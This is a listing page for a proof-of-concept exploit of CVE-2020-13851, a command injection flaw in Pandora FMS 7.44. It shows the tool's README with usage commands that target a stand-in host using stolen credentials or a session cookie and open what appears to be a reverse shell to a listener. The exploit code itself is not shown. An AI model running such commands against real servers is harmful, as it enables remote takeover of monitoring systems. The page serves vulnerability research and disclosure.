CVE-2020-13851 PoC — Artica Pandora FMS 操作系统命令注入漏洞

Source

Associated Vulnerability

Description

CVE-2020-13851 Pandora FMS 7.44

Readme

# Pandora FMS 7.44 CVE-2020-13851

Pandora FMS 7.44 CVE-2020-13851 RCE allows an authenticated user to achieve remote command execution via the events feature. Can be done with credentials or a PHP session cookie.

## Getting Started

### Executing program

* Using credentials
```
python3 pandorafms_7.44.py -t http://pwnedpandora.com/ -u username -p password -lhost 127.0.0.1 -lport 1337
```
* Using PHP session cookie
```
python3 pandorafms_7.44.py -t http://pwnedpandora.com/ -c PHPSESSID -lhost 127.0.0.1 -lport 1337
```

## Help

For Help Menu
```
python3 pandorafms_7.44.py -h
```

## Acknowledgments

* [Core Security](https://www.coresecurity.com/core-labs/advisories/pandora-fms-community-multiple-vulnerabilities)

## Disclaimer
All the code provided on this repository is for educational/research purposes only. Any actions and/or activities related to the material contained within this repository is solely your responsibility. The misuse of the code in this repository can result in criminal charges brought against the persons in question. Author will not be held responsible in the event any criminal charges be brought against any individuals misusing the code in this repository to break the law.

File Snapshot

 [4.0K]  /data/pocs/8b4be452e8b38c0af4583b400e8c2f3c34f95bbc
├── [2.9K]  pandorafms_7.44.py
└── [1.2K]  README.md

0 directories, 2 files

Remarks